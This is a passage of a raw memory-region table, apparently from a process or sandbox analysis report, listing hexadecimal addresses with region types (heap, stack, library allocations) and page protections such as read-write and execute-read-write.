trusted library allocation
|
page read and write
|
||
|
7FF9BFEB0000
|
trusted library allocation
|
page read and write
|
||
|
13E38C5D000
|
trusted library allocation
|
page read and write
|
||
|
13E37562000
|
trusted library allocation
|
page read and write
|
||
|
13E38C7E000
|
trusted library allocation
|
page read and write
|
||
|
7FF9BFD20000
|
trusted library allocation
|
page read and write
|
||
|
223E5524000
|
heap
|
page read and write
|
||
|
28904A63000
|
heap
|
page read and write
|
||
|
7FF9BF53B000
|
trusted library allocation
|
page read and write
|
||
|
13E38960000
|
trusted library allocation
|
page read and write
|
||
|
6FFBAFF000
|
stack
|
page read and write
|
||
|
13E3824D000
|
trusted library allocation
|
page read and write
|
||
|
25D62B5C000
|
heap
|
page read and write
|
||
|
13E4EEB0000
|
heap
|
page read and write
|
||
|
7FF9BF763000
|
trusted library allocation
|
page read and write
|
||
|
13E3862D000
|
trusted library allocation
|
page read and write
|
||
|
7B597E000
|
stack
|
page read and write
|
||
|
13E3885C000
|
trusted library allocation
|
page read and write
|
||
|
13E38511000
|
trusted library allocation
|
page read and write
|
||
|
13E3752C000
|
trusted library allocation
|
page read and write
|
||
|
25D62D04000
|
heap
|
page read and write
|
||
|
C140C7E000
|
stack
|
page read and write
|
||
|
13E4F8CB000
|
heap
|
page read and write
|
||
|
20B537CB000
|
heap
|
page read and write
|
||
|
7FF9BFD30000
|
trusted library allocation
|
page read and write
|
||
|
13E38D82000
|
trusted library allocation
|
page read and write
|
||
|
13E38737000
|
trusted library allocation
|
page read and write
|
||
|
20686528000
|
heap
|
page read and write
|
||
|
13E384ED000
|
trusted library allocation
|
page read and write
|
||
|
1EC91620000
|
heap
|
page read and write
|
||
|
AD05D88000
|
stack
|
page read and write
|
||
|
1EC8FF05000
|
heap
|
page read and write
|
||
|
25D62B52000
|
heap
|
page read and write
|
||
|
13E36F50000
|
trusted library allocation
|
page read and write
|
||
|
25D62B03000
|
heap
|
page read and write
|
||
|
13E373A7000
|
trusted library allocation
|
page read and write
|
||
|
13E38636000
|
trusted library allocation
|
page read and write
|
||
|
13E38871000
|
trusted library allocation
|
page read and write
|
||
|
7FF9BFED0000
|
trusted library allocation
|
page read and write
|
||
|
13E38AB8000
|
trusted library allocation
|
page read and write
|
||
|
25D62B75000
|
heap
|
page read and write
|
||
|
13E4EBAF000
|
heap
|
page read and write
|
||
|
13E38D9D000
|
trusted library allocation
|
page read and write
|
||
|
13E365E0000
|
heap
|
page read and write
|
||
|
223E3B71000
|
heap
|
page read and write
|
||
|
13E3824A000
|
trusted library allocation
|
page read and write
|
||
|
13E378AE000
|
trusted library allocation
|
page read and write
|
||
|
7B5AFD000
|
stack
|
page read and write
|
||
|
13E34A70000
|
heap
|
page read and write
|
||
|
13E3832D000
|
trusted library allocation
|
page read and write
|
||
|
13E38A94000
|
trusted library allocation
|
page read and write
|
||
|
25D62B0A000
|
heap
|
page read and write
|
||
|
13E38868000
|
trusted library allocation
|
page read and write
|
||
|
13E378C3000
|
trusted library allocation
|
page read and write
|
||
|
AB3037E000
|
stack
|
page read and write
|
||
|
D798CFE000
|
stack
|
page read and write
|
||
|
13E38520000
|
trusted library allocation
|
page read and write
|
||
|
13E4F800000
|
heap
|
page read and write
|
||
|
6FFBA7E000
|
stack
|
page read and write
|
||
|
7FF9BFBC0000
|
trusted library allocation
|
page read and write
|
||
|
13E37532000
|
trusted library allocation
|
page read and write
|
||
|
13E38312000
|
trusted library allocation
|
page read and write
|
||
|
13E38190000
|
trusted library allocation
|
page read and write
|
||
|
25D62B75000
|
heap
|
page read and write
|
||
|
7FF9BFC40000
|
trusted library allocation
|
page read and write
|
||
|
13E46BA9000
|
trusted library allocation
|
page read and write
|
||
|
13E383E0000
|
trusted library allocation
|
page read and write
|
||
|
7FF9BFA60000
|
trusted library allocation
|
page read and write
|
||
|
13E38AA0000
|
trusted library allocation
|
page read and write
|
||
|
7FF9BFA10000
|
trusted library allocation
|
page read and write
|
||
|
13E3787B000
|
trusted library allocation
|
page read and write
|
||
|
13E38268000
|
trusted library allocation
|
page read and write
|
||
|
25D62B3E000
|
heap
|
page read and write
|
||
|
13E3772C000
|
trusted library allocation
|
page read and write
|
||
|
13E3873D000
|
trusted library allocation
|
page read and write
|
||
|
13E34C94000
|
heap
|
page read and write
|
||
|
13E373A4000
|
trusted library allocation
|
page read and write
|
||
|
7FF9BFD90000
|
trusted library allocation
|
page read and write
|
||
|
13E38315000
|
trusted library allocation
|
page read and write
|
||
|
13E384DB000
|
trusted library allocation
|
page read and write
|
||
|
13E3739B000
|
trusted library allocation
|
page read and write
|
||
|
28904A3C000
|
heap
|
page read and write
|
||
|
13E376D5000
|
trusted library allocation
|
page read and write
|
||
|
13E3887A000
|
trusted library allocation
|
page read and write
|
||
|
13E34BF0000
|
trusted library section
|
page read and write
|
||
|
D798DFE000
|
stack
|
page read and write
|
||
|
25D62B40000
|
heap
|
page read and write
|
||
|
13E38330000
|
trusted library allocation
|
page read and write
|
||
|
7FF9BFE7A000
|
trusted library allocation
|
page read and write
|
||
|
13E37723000
|
trusted library allocation
|
page read and write
|
||
|
7FF9BF7AD000
|
trusted library allocation
|
page read and write
|
||
|
7FF9BF6C0000
|
trusted library allocation
|
page read and write
|
||
|
7FF9BFE80000
|
trusted library allocation
|
page read and write
|
||
|
13E3873A000
|
trusted library allocation
|
page read and write
|
||
|
13E38856000
|
trusted library allocation
|
page read and write
|
||
|
13E384E7000
|
trusted library allocation
|
page read and write
|
||
|
206864B0000
|
heap
|
page read and write
|
||
|
7FF9BFA20000
|
trusted library allocation
|
page read and write
|
||
|
C140AFE000
|
stack
|
page read and write
|
||
|
13E37705000
|
trusted library allocation
|
page read and write
|
||
|
25D62B53000
|
heap
|
page read and write
|
||
|
13E381B0000
|
trusted library allocation
|
page read and write
|
||
|
13E3851D000
|
trusted library allocation
|
page read and write
|
||
|
7FF9BFEA0000
|
trusted library allocation
|
page read and write
|
||
|
7B6BCD000
|
stack
|
page read and write
|
||
|
13E34CAE000
|
heap
|
page read and write
|
||
|
13E3885F000
|
trusted library allocation
|
page read and write
|
||
|
7FF9BF6D0000
|
trusted library allocation
|
page read and write
|
||
|
2068659F000
|
heap
|
page read and write
|
||
|
7FF9BFD00000
|
trusted library allocation
|
page read and write
|
||
|
7FF9BF7D0000
|
trusted library allocation
|
page read and write
|
||
|
7B5EFE000
|
stack
|
page read and write
|
||
|
13E38C81000
|
trusted library allocation
|
page read and write
|
||
|
7FF9BF5D6000
|
trusted library allocation
|
page read and write
|
||
|
13E38877000
|
trusted library allocation
|
page read and write
|
||
|
7FF9BF5D0000
|
trusted library allocation
|
page read and write
|
||
|
25D62B4A000
|
heap
|
page read and write
|
||
|
13E378CF000
|
trusted library allocation
|
page read and write
|
||
|
13E38A82000
|
trusted library allocation
|
page read and write
|
||
|
13E3897B000
|
trusted library allocation
|
page read and write
|
||
|
25D62B6A000
|
heap
|
page read and write
|
||
|
13E38A9A000
|
trusted library allocation
|
page read and write
|
||
|
13E38265000
|
trusted library allocation
|
page read and write
|
||
|
7FF9BFDB5000
|
trusted library allocation
|
page read and write
|
||
|
13E378BD000
|
trusted library allocation
|
page read and write
|
||
|
13E38996000
|
trusted library allocation
|
page read and write
|
||
|
13E366C6000
|
heap
|
page read and write
|
||
|
13E378DB000
|
trusted library allocation
|
page read and write
|
||
|
7FF9BF800000
|
trusted library allocation
|
page read and write
|
||
|
13E3739E000
|
trusted library allocation
|
page read and write
|
||
|
13E38D97000
|
trusted library allocation
|
page read and write
|
||
|
7FF9BF980000
|
trusted library allocation
|
page read and write
|
||
|
13E3862A000
|
trusted library allocation
|
page read and write
|
||
|
7FF9BF740000
|
trusted library allocation
|
page read and write
|
||
|
2068657C000
|
heap
|
page read and write
|
||
|
7FF9BFE90000
|
trusted library allocation
|
page read and write
|
||
|
25D62B47000
|
heap
|
page read and write
|
||
|
7B5A7F000
|
stack
|
page read and write
|
||
|
13E384F3000
|
trusted library allocation
|
page read and write
|
||
|
1EC8FF00000
|
heap
|
page read and write
|
||
|
13E4F92B000
|
heap
|
page read and write
|
||
|
13E3825F000
|
trusted library allocation
|
page read and write
|
||
|
28904990000
|
heap
|
page read and write
|
||
|
7FF9BFBE0000
|
trusted library allocation
|
page read and write
|
||
|
13E3898D000
|
trusted library allocation
|
page read and write
|
||
|
13E38B4A000
|
trusted library allocation
|
page read and write
|
||
|
13E37559000
|
trusted library allocation
|
page read and write
|
||
|
25D62C44000
|
heap
|
page read and write
|
||
|
13E38639000
|
trusted library allocation
|
page read and write
|
||
|
7FF9BF766000
|
trusted library allocation
|
page read and write
|
||
|
7FF9BFC60000
|
trusted library allocation
|
page read and write
|
||
|
13E38963000
|
trusted library allocation
|
page read and write
|
||
|
13E38886000
|
trusted library allocation
|
page read and write
|
||
|
25D62B5C000
|
heap
|
page read and write
|
||
|
13E34C40000
|
trusted library allocation
|
page read and write
|
||
|
13E38C69000
|
trusted library allocation
|
page read and write
|
||
|
25D62C44000
|
heap
|
page read and write
|
||
|
13E378A5000
|
trusted library allocation
|
page read and write
|
||
|
76B69FE000
|
stack
|
page read and write
|
||
|
13E36BA1000
|
trusted library allocation
|
page read and write
|
||
|
18BBBA50000
|
heap
|
page read and write
|
||
|
13E34B74000
|
heap
|
page read and write
|
||
|
13E38C6F000
|
trusted library allocation
|
page read and write
|
||
|
20686490000
|
heap
|
page read and write
|
||
|
13E38A76000
|
trusted library allocation
|
page read and write
|
||
|
13E389AB000
|
trusted library allocation
|
page read and write
|
||
|
13E34C50000
|
heap
|
page read and write
|
||
|
13E38C66000
|
trusted library allocation
|
page read and write
|
||
|
13E3884D000
|
trusted library allocation
|
page read and write
|
||
|
13E38D73000
|
trusted library allocation
|
page read and write
|
||
|
13E36B30000
|
heap
|
page execute and read and write
|
||
|
13E378AB000
|
trusted library allocation
|
page read and write
|
||
|
13E3888F000
|
trusted library allocation
|
page read and write
|
||
|
13E384FC000
|
trusted library allocation
|
page read and write
|
||
|
13E46BB1000
|
trusted library allocation
|
page read and write
|
||
|
13E38627000
|
trusted library allocation
|
page read and write
|
||
|
20B552D0000
|
heap
|
page read and write
|
||
|
289049E7000
|
heap
|
page read and write
|
||
|
223E3B10000
|
heap
|
page read and write
|
||
|
13E378A8000
|
trusted library allocation
|
page read and write
|
||
|
20686586000
|
heap
|
page read and write
|
||
|
7FF9BFA80000
|
trusted library allocation
|
page read and write
|
||
|
13E4F804000
|
heap
|
page read and write
|
||
|
7B6C0F000
|
stack
|
page read and write
|
||
|
7FF9BF9F0000
|
trusted library allocation
|
page read and write
|
||
|
13E378B1000
|
trusted library allocation
|
page read and write
|
||
|
7FF9BFA50000
|
trusted library allocation
|
page read and write
|
||
|
13E38880000
|
trusted library allocation
|
page read and write
|
||
|
13E3771A000
|
trusted library allocation
|
page read and write
|
||
|
25D629A0000
|
heap
|
page read and write
|
||
|
7FF9BFD50000
|
trusted library allocation
|
page read and write
|
||
|
13E34C20000
|
trusted library allocation
|
page read and write
|
||
|
13E38514000
|
trusted library allocation
|
page read and write
|
||
|
7B5E7A000
|
stack
|
page read and write
|
||
|
7FF9BF520000
|
trusted library allocation
|
page read and write
|
||
|
7FF9BFAD0000
|
trusted library allocation
|
page read and write
|
||
|
7FF9BF524000
|
trusted library allocation
|
page read and write
|
||
|
13E3899C000
|
trusted library allocation
|
page read and write
|
||
|
AB303FE000
|
stack
|
page read and write
|
||
|
13E3898A000
|
trusted library allocation
|
page read and write
|
||
|
13E4EBAB000
|
heap
|
page read and write
|
||
|
7B6A02000
|
stack
|
page read and write
|
||
|
41F06FF000
|
stack
|
page read and write
|
||
|
223E5520000
|
heap
|
page read and write
|
||
|
13E3830F000
|
trusted library allocation
|
page read and write
|
||
|
20686815000
|
heap
|
page read and write
|
||
|
13E3819B000
|
trusted library allocation
|
page read and write
|
||
|
13E376F0000
|
trusted library allocation
|
page read and write
|
||
|
13E3874F000
|
trusted library allocation
|
page read and write
|
||
|
13E378C9000
|
trusted library allocation
|
page read and write
|
||
|
18BBB680000
|
heap
|
page read and write
|
||
|
7B6B4E000
|
stack
|
page read and write
|
||
|
13E38734000
|
trusted library allocation
|
page read and write
|
||
|
7FF9BF9A0000
|
trusted library allocation
|
page read and write
|
||
|
13E4F85E000
|
heap
|
page read and write
|
||
|
7FF9BFA30000
|
trusted library allocation
|
page read and write
|
||
|
13E3872B000
|
trusted library allocation
|
page read and write
|
||
|
13E38722000
|
trusted library allocation
|
page read and write
|
||
|
7FF9BF932000
|
trusted library allocation
|
page read and write
|
||
|
13E38401000
|
trusted library allocation
|
page read and write
|
||
|
13E389A8000
|
trusted library allocation
|
page read and write
|
||
|
7FF9BFDA0000
|
trusted library allocation
|
page read and write
|
||
|
13E38AC1000
|
trusted library allocation
|
page read and write
|
||
|
13E37896000
|
trusted library allocation
|
page read and write
|
||
|
7B6A4E000
|
stack
|
page read and write
|
||
|
13E38981000
|
trusted library allocation
|
page read and write
|
||
|
28904A5B000
|
heap
|
page read and write
|
||
|
7B5BFE000
|
stack
|
page read and write
|
||
|
13E38318000
|
trusted library allocation
|
page read and write
|
||
|
AD0637F000
|
stack
|
page read and write
|
||
|
7FF9BF860000
|
trusted library allocation
|
page read and write
|
||
|
13E38404000
|
trusted library allocation
|
page read and write
|
||
|
13E38B59000
|
trusted library allocation
|
page read and write
|
||
|
7FF9BFBA0000
|
trusted library allocation
|
page read and write
|
||
|
7FF9BF850000
|
trusted library allocation
|
page read and write
|
||
|
76B67FD000
|
stack
|
page read and write
|
||
|
25D62B45000
|
heap
|
page read and write
|
||
|
13E37383000
|
trusted library allocation
|
page read and write
|
||
|
13E4EC02000
|
heap
|
page read and write
|
||
|
223E3AC0000
|
heap
|
page read and write
|
||
|
13E34B80000
|
heap
|
page read and write
|
||
|
13E36F43000
|
trusted library allocation
|
page read and write
|
||
|
13E378C0000
|
trusted library allocation
|
page read and write
|
||
|
13E3860C000
|
trusted library allocation
|
page read and write
|
||
|
13E37875000
|
trusted library allocation
|
page read and write
|
||
|
20B53770000
|
heap
|
page read and write
|
||
|
AB306FF000
|
stack
|
page read and write
|
||
|
28904A24000
|
heap
|
page read and write
|
||
|
13E38517000
|
trusted library allocation
|
page read and write
|
||
|
13E38993000
|
trusted library allocation
|
page read and write
|
||
|
25D62B56000
|
heap
|
page read and write
|
||
|
13E38AA3000
|
trusted library allocation
|
page read and write
|
||
|
7FF9BF74A000
|
trusted library allocation
|
page read and write
|
||
|
25D62BD0000
|
heap
|
page read and write
|
||
|
7FF9BF940000
|
trusted library allocation
|
page execute and read and write
|
||
|
13E3874C000
|
trusted library allocation
|
page read and write
|
||
|
18BBB760000
|
heap
|
page read and write
|
||
|
13E3861B000
|
trusted library allocation
|
page read and write
|
||
|
25D62B1D000
|
heap
|
page read and write
|
||
|
13E3786F000
|
trusted library allocation
|
page read and write
|
||
|
13E384F6000
|
trusted library allocation
|
page read and write
|
||
|
7FF9BF760000
|
trusted library allocation
|
page read and write
|
||
|
7FF9BFAA0000
|
trusted library allocation
|
page read and write
|
||
|
7FF9BFD80000
|
trusted library allocation
|
page read and write
|
||
|
13E38865000
|
trusted library allocation
|
page read and write
|
||
|
13E38743000
|
trusted library allocation
|
page read and write
|
||
|
13E376E7000
|
trusted library allocation
|
page read and write
|
||
|
25D62BF0000
|
heap
|
page read and write
|
||
|
7FF9BF606000
|
trusted library allocation
|
page execute and read and write
|
||
|
7B6C8F000
|
stack
|
page read and write
|
||
|
13E4F8BF000
|
heap
|
page read and write
|
||
|
7B6079000
|
stack
|
page read and write
|
||
|
13E3817C000
|
trusted library allocation
|
page read and write
|
||
|
13E373C2000
|
trusted library allocation
|
page read and write
|
||
|
13E3831B000
|
trusted library allocation
|
page read and write
|
||
|
13E384F9000
|
trusted library allocation
|
page read and write
|
||
|
7FF9BFD10000
|
trusted library allocation
|
page read and write
|
||
|
7DF40DE60000
|
trusted library allocation
|
page execute and read and write
|
||
|
13E38B4D000
|
trusted library allocation
|
page read and write
|
||
|
13E38D7F000
|
trusted library allocation
|
page read and write
|
||
|
13E37947000
|
trusted library allocation
|
page read and write
|
||
|
13E381AE000
|
trusted library allocation
|
page read and write
|
||
|
13E38841000
|
trusted library allocation
|
page read and write
|
||
|
13E38407000
|
trusted library allocation
|
page read and write
|
||
|
13E376DE000
|
trusted library allocation
|
page read and write
|
||
|
25D62C00000
|
heap
|
page read and write
|
||
|
13E3899F000
|
trusted library allocation
|
page read and write
|
||
|
7FF9BF9E0000
|
trusted library allocation
|
page read and write
|
||
|
7FF9BF7D3000
|
trusted library allocation
|
page read and write
|
||
|
13E38C7B000
|
trusted library allocation
|
page read and write
|
||
|
13E38731000
|
trusted library allocation
|
page read and write
|
||
|
25D62B83000
|
heap
|
page read and write
|
||
|
13E38333000
|
trusted library allocation
|
page read and write
|
||
|
13E38180000
|
trusted library allocation
|
page read and write
|
||
|
13E38630000
|
trusted library allocation
|
page read and write
|
||
|
13E46BA1000
|
trusted library allocation
|
page read and write
|
||
|
13E38A9D000
|
trusted library allocation
|
page read and write
|
||
|
28904C65000
|
heap
|
page read and write
|
||
|
25D62C44000
|
heap
|
page read and write
|
||
|
7FF9BF98A000
|
trusted library allocation
|
page read and write
|
||
|
13E38A8E000
|
trusted library allocation
|
page read and write
|
||
|
7FF9BFEE0000
|
trusted library allocation
|
page execute and read and write
|
||
|
AB305FF000
|
stack
|
page read and write
|
||
|
25D62AA0000
|
heap
|
page read and write
|
||
|
7B5C7D000
|
stack
|
page read and write
|
||
|
D798D7E000
|
stack
|
page read and write
|
||
|
13E38321000
|
trusted library allocation
|
page read and write
|
||
|
13E38B6E000
|
trusted library allocation
|
page read and write
|
||
|
13E383F5000
|
trusted library allocation
|
page read and write
|
||
|
C140A7E000
|
stack
|
page read and write
|
||
|
13E3860F000
|
trusted library allocation
|
page read and write
|
||
|
41F03BE000
|
stack
|
page read and write
|
||
|
13E3789F000
|
trusted library allocation
|
page read and write
|
||
|
13E37565000
|
trusted library allocation
|
page read and write
|
||
|
7FF9BFB10000
|
trusted library allocation
|
page execute and read and write
|
||
|
AD062FD000
|
stack
|
page read and write
|
||
|
13E38990000
|
trusted library allocation
|
page read and write
|
||
|
13E4F931000
|
heap
|
page read and write
|
||
|
13E38D76000
|
trusted library allocation
|
page read and write
|
||
|
AD0617E000
|
stack
|
page read and write
|
||
|
AB30278000
|
stack
|
page read and write
|
||
|
13E37520000
|
trusted library allocation
|
page read and write
|
||
|
13E38C75000
|
trusted library allocation
|
page read and write
|
||
|
7FF9BFE50000
|
trusted library allocation
|
page read and write
|
||
|
13E38AAF000
|
trusted library allocation
|
page read and write
|
||
|
7FF9BFE62000
|
trusted library allocation
|
page read and write
|
||
|
13E4EBA0000
|
heap
|
page read and write
|
||
|
AB3047F000
|
stack
|
page read and write
|
||
|
7FF9BFA70000
|
trusted library allocation
|
page read and write
|
||
|
13E3840A000
|
trusted library allocation
|
page read and write
|
||
|
13E4F802000
|
heap
|
page read and write
|
||
|
7FF9BFCF0000
|
trusted library allocation
|
page read and write
|
||
|
20686520000
|
heap
|
page read and write
|
||
|
223E3B69000
|
heap
|
page read and write
|
||
|
289049E0000
|
heap
|
page read and write
|
||
|
25D62B15000
|
heap
|
page read and write
|
||
|
76B61E6000
|
stack
|
page read and write
|
||
|
13E3840D000
|
trusted library allocation
|
page read and write
|
||
|
25D62D0D000
|
heap
|
page read and write
|
||
|
13E3887D000
|
trusted library allocation
|
page read and write
|
||
|
13E3896F000
|
trusted library allocation
|
page read and write
|
||
|
7FF9BF952000
|
trusted library allocation
|
page read and write
|
||
|
13E37711000
|
trusted library allocation
|
page read and write
|
||
|
13E376E1000
|
trusted library allocation
|
page read and write
|
||
|
13E381AA000
|
trusted library allocation
|
page read and write
|
||
|
7FF9BF790000
|
trusted library allocation
|
page read and write
|
||
|
6FFBB7F000
|
stack
|
page read and write
|
||
|
7FF9BF8A0000
|
trusted library allocation
|
page read and write
|
||
|
2068654D000
|
heap
|
page read and write
|
||
|
20B537B4000
|
heap
|
page read and write
|
||
|
13E4F8FF000
|
heap
|
page read and write
|
||
|
25D62D00000
|
heap
|
page read and write
|
||
|
13E37553000
|
trusted library allocation
|
page read and write
|
||
|
1EC8FBAA000
|
heap
|
page read and write
|
||
|
13E36C1E000
|
trusted library allocation
|
page read and write
|
||
|
13E38883000
|
trusted library allocation
|
page read and write
|
||
|
13E383F8000
|
trusted library allocation
|
page read and write
|
||
|
13E38609000
|
trusted library allocation
|
page read and write
|
||
|
13E3831E000
|
trusted library allocation
|
page read and write
|
||
|
13E38523000
|
trusted library allocation
|
page read and write
|
||
|
7FF9BFC70000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF9BFE73000
|
trusted library allocation
|
page read and write
|
||
|
7FF9BFC10000
|
trusted library allocation
|
page read and write
|
||
|
13E38603000
|
trusted library allocation
|
page read and write
|
||
|
25D62B3C000
|
heap
|
page read and write
|
||
|
7B58FE000
|
stack
|
page read and write
|
||
|
7FF9BFAE0000
|
trusted library allocation
|
page read and write
|
||
|
7FF9BFA40000
|
trusted library allocation
|
page read and write
|
||
|
AB3067E000
|
stack
|
page read and write
|
||
|
13E3886B000
|
trusted library allocation
|
page read and write
|
||
|
13E389A2000
|
trusted library allocation
|
page read and write
|
||
|
13E36560000
|
trusted library allocation
|
page read and write
|
||
|
7FF9BF537000
|
trusted library allocation
|
page read and write
|
||
|
1EC8FB93000
|
heap
|
page read and write
|
||
|
13E378BA000
|
trusted library allocation
|
page read and write
|
||
|
7FF9BF7B0000
|
trusted library allocation
|
page read and write
|
||
|
7FF9BFD40000
|
trusted library allocation
|
page read and write
|
||
|
7FF9BF7A0000
|
trusted library allocation
|
page read and write
|
||
|
AB304FE000
|
stack
|
page read and write
|
||
|
13E384FF000
|
trusted library allocation
|
page read and write
|
||
|
25D62B69000
|
heap
|
page read and write
|
||
|
13E36F36000
|
trusted library allocation
|
page read and write
|
||
|
13E38C72000
|
trusted library allocation
|
page read and write
|
||
|
13E38987000
|
trusted library allocation
|
page read and write
|
||
|
13E366C0000
|
heap
|
page read and write
|
||
|
13E38B5F000
|
trusted library allocation
|
page read and write
|
||
|
25D62C44000
|
heap
|
page read and write
|
||
|
7FF9BF990000
|
trusted library allocation
|
page read and write
|
||
|
13E34BE0000
|
trusted library section
|
page read and write
|
||
|
20B53980000
|
heap
|
page read and write
|
||
|
C14097E000
|
stack
|
page read and write
|
||
|
13E3850B000
|
trusted library allocation
|
page read and write
|
||
|
AD0607E000
|
stack
|
page read and write
|
||
|
13E37374000
|
trusted library allocation
|
page read and write
|
||
|
13E38853000
|
trusted library allocation
|
page read and write
|
||
|
13E383DD000
|
trusted library allocation
|
page read and write
|
||
|
13E3788D000
|
trusted library allocation
|
page read and write
|
||
|
25D62AFD000
|
heap
|
page read and write
|
||
|
13E38749000
|
trusted library allocation
|
page read and write
|
||
|
13E38253000
|
trusted library allocation
|
page read and write
|
||
|
13E385F1000
|
trusted library allocation
|
page read and write
|
||
|
13E37EEE000
|
trusted library allocation
|
page read and write
|
||
|
7FF9BF9D0000
|
trusted library allocation
|
page read and write
|
||
|
13E364F0000
|
trusted library allocation
|
page read and write
|
||
|
13E383FE000
|
trusted library allocation
|
page read and write
|
||
|
13E4EBB9000
|
heap
|
page read and write
|
||
|
13E376FC000
|
trusted library allocation
|
page read and write
|
||
|
7B5B7F000
|
stack
|
page read and write
|
||
|
13E3896C000
|
trusted library allocation
|
page read and write
|
||
|
13E383E6000
|
trusted library allocation
|
page read and write
|
||
|
7FF9BFC00000
|
trusted library allocation
|
page read and write
|
||
|
289049C0000
|
heap
|
page read and write
|
||
|
13E383E9000
|
trusted library allocation
|
page read and write
|
||
|
20B53A00000
|
heap
|
page read and write
|
||
|
25D62B70000
|
heap
|
page read and write
|
||
|
13E36DC1000
|
trusted library allocation
|
page read and write
|
||
|
13E376EA000
|
trusted library allocation
|
page read and write
|
||
|
25D62AD0000
|
heap
|
page read and write
|
||
|
13E38D94000
|
trusted library allocation
|
page read and write
|
||
|
13E38862000
|
trusted library allocation
|
page read and write
|
||
|
13E38D79000
|
trusted library allocation
|
page read and write
|
||
|
13E3755C000
|
trusted library allocation
|
page read and write
|
||
|
13E34CD9000
|
heap
|
page read and write
|
||
|
13E38984000
|
trusted library allocation
|
page read and write
|
||
|
289049A0000
|
heap
|
page read and write
|
||
|
7FF9BFAB0000
|
trusted library allocation
|
page read and write
|
||
|
7FF9BFC20000
|
trusted library allocation
|
page read and write
|
||
|
76B68FE000
|
stack
|
page read and write
|
||
|
7FF9BFC30000
|
trusted library allocation
|
page read and write
|
||
|
13E37702000
|
trusted library allocation
|
page read and write
|
||
|
13E38859000
|
trusted library allocation
|
page read and write
|
||
|
13E4F91C000
|
heap
|
page read and write
|
||
|
13E376D8000
|
trusted library allocation
|
page read and write
|
||
|
13E38B53000
|
trusted library allocation
|
page read and write
|
||
|
7FF9BF780000
|
trusted library allocation
|
page read and write
|
||
|
7FF9BFE60000
|
trusted library allocation
|
page read and write
|
||
|
13E34CD6000
|
heap
|
page read and write
|
||
|
25D62C44000
|
heap
|
page read and write
|
||
|
13E37893000
|
trusted library allocation
|
page read and write
|
||
|
20B537F2000
|
heap
|
page read and write
|
||
|
76B64FE000
|
unkown
|
page read and write
|
||
|
13E383E3000
|
trusted library allocation
|
page read and write
|
||
|
13E4EC33000
|
heap
|
page read and write
|
||
|
13E38C63000
|
trusted library allocation
|
page read and write
|
||
|
13E37544000
|
trusted library allocation
|
page read and write
|
||
|
7FF9BF7F0000
|
trusted library allocation
|
page execute and read and write
|
||
|
13E38A8B000
|
trusted library allocation
|
page read and write
|
||
|
13E38B65000
|
trusted library allocation
|
page read and write
|
||
|
7FF9BFEF0000
|
trusted library allocation
|
page read and write
|
||
|
76B65FE000
|
stack
|
page read and write
|
||
|
13E38972000
|
trusted library allocation
|
page read and write
|
||
|
25D62B84000
|
heap
|
page read and write
|
||
|
7FF9BF770000
|
trusted library allocation
|
page read and write
|
||
|
C140BFE000
|
stack
|
page read and write
|
||
|
13E38746000
|
trusted library allocation
|
page read and write
|
||
|
13E38624000
|
trusted library allocation
|
page read and write
|
||
|
AD063FE000
|
stack
|
page read and write
|
||
|
13E38ABB000
|
trusted library allocation
|
page read and write
|
||
|
13E38D8B000
|
trusted library allocation
|
page read and write
|
||
|
7FF9BF640000
|
trusted library allocation
|
page execute and read and write
|
||
|
13E38D7C000
|
trusted library allocation
|
page read and write
|
||
|
18BBD390000
|
heap
|
page read and write
|
||
|
13E38D9A000
|
trusted library allocation
|
page read and write
|
||
|
13E38B50000
|
trusted library allocation
|
page read and write
|
||
|
13E4EBF2000
|
heap
|
page read and write
|
||
|
13E373AD000
|
trusted library allocation
|
page read and write
|
||
|
7FF9BFBB0000
|
trusted library allocation
|
page read and write
|
||
|
7FF9BF9E3000
|
trusted library allocation
|
page read and write
|
||
|
25D62B30000
|
heap
|
page read and write
|
||
|
20B53880000
|
heap
|
page read and write
|
||
|
13E38892000
|
trusted library allocation
|
page read and write
|
||
|
7FF9BF726000
|
trusted library allocation
|
page read and write
|
||
|
13E38B6B000
|
trusted library allocation
|
page read and write
|
||
|
13E378DE000
|
trusted library allocation
|
page read and write
|
||
|
13E37523000
|
trusted library allocation
|
page read and write
|
||
|
7FF9BF5DC000
|
trusted library allocation
|
page execute and read and write
|
||
|
C1408FE000
|
stack
|
page read and write
|
||
|
1EC8FD20000
|
heap
|
page read and write
|
||
|
7B5871000
|
stack
|
page read and write
|
||
|
18BBBA55000
|
heap
|
page read and write
|
||
|
206865A4000
|
heap
|
page read and write
|
||
|
13E38725000
|
trusted library allocation
|
page read and write
|
||
|
13E38262000
|
trusted library allocation
|
page read and write
|
||
|
7FF9BF970000
|
trusted library allocation
|
page read and write
|
||
|
13E38728000
|
trusted library allocation
|
page read and write
|
||
|
13E385F7000
|
trusted library allocation
|
page read and write
|
||
|
25D62B6E000
|
heap
|
page read and write
|
||
|
13E34C8D000
|
heap
|
page read and write
|
||
|
18BBB810000
|
heap
|
page read and write
|
||
|
13E38633000
|
trusted library allocation
|
page read and write
|
||
|
7FF9BF810000
|
trusted library allocation
|
page read and write
|
||
|
13E38966000
|
trusted library allocation
|
page read and write
|
||
|
13E38C84000
|
trusted library allocation
|
page read and write
|
||
|
13E37717000
|
trusted library allocation
|
page read and write
|
||
|
13E37547000
|
trusted library allocation
|
page read and write
|
||
|
13E34C00000
|
trusted library allocation
|
page read and write
|
||
|
C140878000
|
stack
|
page read and write
|
||
|
13E3883B000
|
trusted library allocation
|
page read and write
|
||
|
13E38B62000
|
trusted library allocation
|
page read and write
|
||
|
7FF9BFE8A000
|
trusted library allocation
|
page read and write
|
||
|
13E38D6A000
|
trusted library allocation
|
page read and write
|
||
|
13E38256000
|
trusted library allocation
|
page read and write
|
||
|
25D62B3C000
|
heap
|
page read and write
|
||
|
7FF9BF7A9000
|
trusted library allocation
|
page read and write
|
||
|
13E4F91E000
|
heap
|
page read and write
|
||
|
25D62D0D000
|
heap
|
page read and write
|
||
|
13E389A5000
|
trusted library allocation
|
page read and write
|
||
|
13E383EC000
|
trusted library allocation
|
page read and write
|
||
|
13E34C92000
|
heap
|
page read and write
|
||
|
13E38A97000
|
trusted library allocation
|
page read and write
|
||
|
76B66FE000
|
stack
|
page read and write
|
||
|
25D62B05000
|
heap
|
page read and write
|
||
|
7FF9BFB00000
|
trusted library allocation
|
page read and write
|
||
|
13E3756B000
|
trusted library allocation
|
page read and write
|
||
|
1EC8FBCE000
|
heap
|
page read and write
|
||
|
13E4EC0B000
|
heap
|
page read and write
|
||
|
13E38D91000
|
trusted library allocation
|
page read and write
|
||
|
13E38502000
|
trusted library allocation
|
page read and write
|
||
|
20686564000
|
heap
|
page read and write
|
||
|
25D62B34000
|
